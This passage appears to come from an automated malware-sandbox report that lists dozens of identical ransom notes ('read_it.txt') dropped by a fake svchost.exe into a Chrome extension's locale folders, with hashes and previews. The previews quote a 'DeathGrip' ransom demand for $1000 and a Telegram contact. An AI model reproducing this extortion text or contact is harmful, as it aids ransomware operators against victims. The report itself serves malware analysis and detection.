                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
